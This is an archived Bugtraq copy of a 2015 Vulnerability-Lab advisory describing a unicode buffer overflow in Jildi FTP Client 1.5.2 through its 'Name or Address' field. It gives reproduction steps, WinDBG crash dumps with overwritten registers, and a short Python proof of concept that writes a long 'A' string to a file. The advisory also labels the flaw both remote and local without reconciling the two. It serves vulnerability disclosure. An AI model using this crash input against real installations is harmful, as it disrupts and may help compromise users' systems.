Bugtraq mailing list archives

Jildi FTP Client 1.5.2 b1138 - Buffer Overflow Vulnerability


From: banana88 () inbox com
Date: Wed, 3 Jun 2015 11:16:35 GMT


Document Title:
===============
Jildi FTP Client 1.5.2 b1138 - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1503


Release Date:
=============
2015-06-03


Vulnerability Laboratory ID (VL-ID):
====================================
1503


Common Vulnerability Scoring System:
====================================
6.2


Product & Service Introduction:
===============================
JilidFTP is a powerful ftp-client program for Windows, it fast and reliable and with lots of useful features. It 
supports multi-thread file upload or 
download , so you can upload or download several files at the same time. The job manager integrates with the Windows 
scheduler engine ,this provide
you more freedom and flexibility to upload or download your files. It can also traces changes within a local directory 
and apply these changes to 
remote ftp server .The user-friendly interface lets your software distribution, uploading files to a web-server, and 
providing archives for various 
purposes more easily.

(Copy of the Homepage: http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an unicode buffer overflow vulnerability in the official 
Jildi FTP Client v1.5.2 (Build 1138) software.


Vulnerability Disclosure Timeline:
==================================
2015-06-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Jildi
Product: Jildi FTP Client 1.5.2 (Build 1138)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow software vulnerability has been discovered in the official Jildi FTP Client v1.5.2 (Build 1138) 
software.
The buffer overflow vulnerability allows to include unicode strings to basic code inputs from a system user account to 
compromise the software process or system.

A fail to sanitize the input of the `Name or Address` results in compromise of the software system process. Local 
attackers are 
able to include large unicode strings to overwrite the registers (eip, ebp and co.) and gain higher system access 
privileges.
The issue is a classic unicode buffer overflow that is exploitable by local attackers with low or restricted system 
user accounts.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring 
system) count of 6.2. 
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful 
exploitation of the 
vulnerability results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
                                                [+] Name
                                                [+] Address


Proof of Concept (PoC):
=======================
The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and 
without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below 
to continue.

Manual steps to reproduce the vulnerability ...
1. Copy the AAAA...string from Jildi_FTP.txt to clipboard
2. Open Jildi Ftp and press Connect
3. Paste the data in the Option `Name or Address` and press connect
4. Successful reproduce of the buffer overflow vulnerability!


Crash Analysis using WinDBG: Option --> Address
(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??  
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141

Crash Analysis using WinDBG: Option --> Name
(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141

PoC: Exploitcode
filename="Jildi_FTP.txt"
junk1="\x41" * 20000
buffer=junk1 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()


Security Risk:
==============
The security risk of the buffer overflow vulnerability in the Name/Address input parameter is estimated as high. (CVSS 
6.2)


Credits & Authors:
==================
metacom (PwC New Zealand) - [http://www.vulnerability-lab.com/show.php?user=metacom]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™




Current thread: